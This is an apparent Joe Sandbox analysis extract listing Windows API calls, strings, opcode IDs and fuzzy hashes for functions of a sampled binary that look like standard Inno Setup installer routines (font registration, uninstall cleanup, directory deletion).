                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1375471231-1421604804
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3029c443a8498c56a1c8d286568716a82b1e902b717456c5d6645635e99ed988
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2e7cf1fa8793a22cdcb7cccf6aa375e82942df810c5d1ff78a46bc34c798803d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3029c443a8498c56a1c8d286568716a82b1e902b717456c5d6645635e99ed988
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65411474A001099BDB00EFA5D8C2ADEB7B9EB44309F50857BE91477392DB389E058B69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00450918: SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 00495F55
                                                                                                                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00495F69
                                                                                                                                                                                                                                                                                                                                                                  • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00495F83
                                                                                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495F8F
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495F95
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495FA8
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Deleting Uninstall data files., xrefs: 00495ECB
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Deleting Uninstall data files.
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1570157960-2568741658
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 23da1316c50969bb810f13416529c5ad46a4d90d4c3b6db3608d618ecf590902
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fec72cc46ef3efd5c3c8e8a450f489c3c08d507a48e2b84f6ee45df75d5b7e94
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 23da1316c50969bb810f13416529c5ad46a4d90d4c3b6db3608d618ecf590902
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34219571304610AFEB11EB75ECC2B2637A8EB54338F61053BF504DA1E6D678AC008B1D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004705A1,?,?,?,?,00000000), ref: 0047050B
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004705A1), ref: 00470522
                                                                                                                                                                                                                                                                                                                                                                  • AddFontResourceA.GDI32(00000000), ref: 0047053F
                                                                                                                                                                                                                                                                                                                                                                  • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00470553
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Failed to set value in Fonts registry key., xrefs: 00470514
                                                                                                                                                                                                                                                                                                                                                                  • AddFontResource, xrefs: 0047055D
                                                                                                                                                                                                                                                                                                                                                                  • Failed to open Fonts registry key., xrefs: 00470529
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                                                                                                                                                                                                                                                                                                  • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 955540645-649663873
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f568778fb6c734a0302aafbabb97131ab6cfbf139b6919693cc27d2514087333
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 66ce3b01f7eb708e2302e7809b1ea03697ff66c32de1c99646f3643d23023453
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f568778fb6c734a0302aafbabb97131ab6cfbf139b6919693cc27d2514087333
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62216570741204BBDB10EA669C42FAE779D9B55708F50843BB904EB3C2D67CDE028A5D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE
                                                                                                                                                                                                                                                                                                                                                                  • GetVersion.KERNEL32 ref: 004631CC
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 0046320A
                                                                                                                                                                                                                                                                                                                                                                  • SHGetFileInfo.SHELL32(004632A8,00000000,?,00000160,00004011), ref: 00463227
                                                                                                                                                                                                                                                                                                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 00463245
                                                                                                                                                                                                                                                                                                                                                                  • SetCursor.USER32(00000000,00000000,00007F02,004632A8,00000000,?,00000160,00004011), ref: 0046324B
                                                                                                                                                                                                                                                                                                                                                                  • SetCursor.USER32(?,0046328B,00007F02,004632A8,00000000,?,00000160,00004011), ref: 0046327E
                                                                                                                                                                                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Explorer
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2594429197-512347832
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e51ab44d2e52b3d60675834673e9b9904728f2271d1ef9b75da4c79774d1131e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b0d998c5e58c3251a46d3edbb0a2afbc6be3b3781793d4cbec8386629f90fe5f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e51ab44d2e52b3d60675834673e9b9904728f2271d1ef9b75da4c79774d1131e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA21E7307403446AEB10FF795C57F9A7698DB09709F5040BFF605EA1C3EA7C8908866D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                                                                                                                                                                                                                                                                                  • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                                                                                                                                                                                                                                                                                  • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                                                                                                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                                                                                                                                                                                                                  • String ID: L2h$\2h$|2h
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 730355536-2574461566
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,0045A2F2,?,00000000,00000000,00000000,?,00000006,?,00000000,0049722D,?,00000000,004972D0), ref: 0045A236
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004543E0: FindClose.KERNEL32(000000FF,004544D6), ref: 004544C5
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Deleting directory: %s, xrefs: 0045A1BF
                                                                                                                                                                                                                                                                                                                                                                  • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 0045A2AB
                                                                                                                                                                                                                                                                                                                                                                  • Failed to delete directory (%d)., xrefs: 0045A2CC
                                                                                                                                                                                                                                                                                                                                                                  • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 0045A210
                                                                                                                                                                                                                                                                                                                                                                  • Failed to delete directory (%d). Will retry later., xrefs: 0045A24F
                                                                                                                                                                                                                                                                                                                                                                  • Failed to strip read-only attribute., xrefs: 0045A204
                                                                                                                                                                                                                                                                                                                                                                  • Stripped read-only attribute., xrefs: 0045A1F8
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseErrorFindLast
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetCapture.USER32 ref: 00422EB4
                                                                                                                                                                                                                                                                                                                                                                  • GetCapture.USER32 ref: 00422EC3
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
                                                                                                                                                                                                                                                                                                                                                                  • ReleaseCapture.USER32 ref: 00422ECE
                                                                                                                                                                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 00422EDD
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
                                                                                                                                                                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 00422FCF
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 0042F2CA
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0042F2E1
                                                                                                                                                                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 0042F2EA
                                                                                                                                                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F317
                                                                                                                                                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?,0042F447,00000000,?), ref: 0042F338
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window$ActiveLong$Message
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2785966331-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 09d7f37050b0567ee29fe8455e9c964ed726054a65f14973020f619371741b48
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0493a3c03df3966e51b4b777c60d25e7c68e0b9e8cdf2dbcd65ae894a3a71964
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09d7f37050b0567ee29fe8455e9c964ed726054a65f14973020f619371741b48
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7631B471A00654AFDB01EFB5DC52E6EBBB8EB09714B91447AF804E3691D738AD10CB58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A570.USER32(00000000), ref: 0042949A
                                                                                                                                                                                                                                                                                                                                                                  • GetTextMetricsA.GDI32(00000000), ref: 004294A3
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004294B2
                                                                                                                                                                                                                                                                                                                                                                  • GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004294C6
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294CE
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000006), ref: 004294F3
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000006), ref: 0042950D
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 361401722-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ed5406780fbe6b6ddf9677d4a66f370c2a77f814a30f66ac1398573dbf155f17
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f9189b99ec718bdc55f682ba078bc6b9c4dab98ca430e676b6dc028aca6f8884
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed5406780fbe6b6ddf9677d4a66f370c2a77f814a30f66ac1398573dbf155f17
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3301E1917087513BFB11B67A9CC2F6B61C8CB8435CF44043FFA459A3D2D96C9C80866A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A570.USER32(00000000,?,00419069,004985AE), ref: 0041DE37
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4620.GDI32(00000000,0000005A,00000000,?,00419069,004985AE), ref: 0041DE41
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419069,004985AE), ref: 0041DE4E
                                                                                                                                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
                                                                                                                                                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000007), ref: 0041DE6B
                                                                                                                                                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000005), ref: 0041DE77
                                                                                                                                                                                                                                                                                                                                                                  • GetStockObject.GDI32(0000000D), ref: 0041DE83
                                                                                                                                                                                                                                                                                                                                                                  • LoadIconA.USER32(00000000,00007F00), ref: 0041DE94
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ObjectStock$A4620A480A570IconLoad
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2905290459-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c7b946ff5d18463f692f08f3109d9fac972284bfbf41894a6d0fe66ccf938658
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4e0a0a69a1fbcc37fa68332f5170e2556ef2fd96a8c36c1a21edcb526b0e3b4b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7b946ff5d18463f692f08f3109d9fac972284bfbf41894a6d0fe66ccf938658
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E11100B06457015AE740FF666A92BA63694D724708F00813FF605AF3D2D7792C449B9E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 004636B0
                                                                                                                                                                                                                                                                                                                                                                  • SetCursor.USER32(00000000,00000000,00007F02,00000000,00463745), ref: 004636B6
                                                                                                                                                                                                                                                                                                                                                                  • SetCursor.USER32(?,0046372D,00007F02,00000000,00463745), ref: 00463720
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
